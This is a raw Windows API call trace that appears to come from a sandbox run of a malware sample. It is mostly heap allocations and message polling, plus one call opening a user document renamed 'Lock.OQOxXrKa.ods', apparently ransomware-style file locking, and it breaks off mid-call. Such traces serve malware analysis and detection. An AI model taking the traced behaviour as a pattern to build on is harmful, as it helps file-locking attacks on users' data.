[0265.645] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.645] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0265.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.OQOxXrKa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.oqoxxrka.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.646] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.647] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.647] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.647] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.647] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0265.647] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0265.713] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1ca6, lpOverlapped=0x0) returned 1 [0265.714] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0265.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11ca6) returned 0x24b7a48 [0265.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.716] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.716] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0265.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11ca6) returned 0x24b7a48 [0265.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11ca6) returned 0x24db3a8 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.721] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.721] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.725] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.725] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.725] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.725] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.726] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.726] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.726] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.726] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.726] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.727] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.727] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.728] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.728] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.728] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.728] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.728] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: 